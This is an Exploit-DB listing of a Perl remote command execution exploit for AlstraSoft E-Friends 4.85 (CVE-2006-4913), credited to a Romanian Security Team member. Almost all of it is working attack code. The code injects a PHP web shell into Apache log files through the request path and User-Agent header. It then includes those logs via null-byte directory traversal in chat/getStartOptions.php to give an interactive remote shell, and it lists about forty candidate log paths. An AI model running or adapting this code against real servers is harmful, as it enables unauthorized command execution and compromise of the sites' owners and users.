AlstraSoft E-Friends <= 4.85 - Remote Command Execution Exploit

2006-09-18T00:00:00
ID EDB-ID:2389
Type exploitdb
Reporter Kw3[R]Ln
Modified 2006-09-18T00:00:00

Description

AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit. CVE-2006-4913. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
#
# AlstraSoft Efriends 4.85 Remote Command Execution Exploit
# Site : http://www.alstrasoft.com/efriends.htm
#
# Coded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET
# Contact: ciriboflacs@yahoo.com or kw3rln@rst-crew.net
#
# PS: fuck CarcaBot ..another lame romanian guy=))


use IO::Socket;
use LWP::Simple;

#ripped from rgod
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[RST] AlstraSoft Efriends 4.85 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3[R]Ln from Romanian Security Team [ http://rst-crew.net ] \n\n";


if (@ARGV &lt; 3)
{
    print "[RST] Usage: efriends.pl [host] [path] [apache_path]\n\n";
    print "[RST] Apache Path: \n";
    $i = 0;
    while($apache[$i])
    { print "[$i] $apache[$i]\n";$i++;}
    exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "[RST] Injecting some code in log files...\n";
$CODE="&lt;?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?&gt;";
$socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = &lt;STDIN&gt;;

while($cmd !~ "q") {
    $socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "[RST] Could not connect to host.\n\n";
    
    print $socket "GET ".$path."chat/getStartOptions.php?lang=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";    
    
    while ($raspuns = &lt;$socket&gt;)
    {
        print $raspuns;
    }
    
    print "[shell] ";
    $cmd = &lt;STDIN&gt;;    
}

# milw0rm.com [2006-09-18]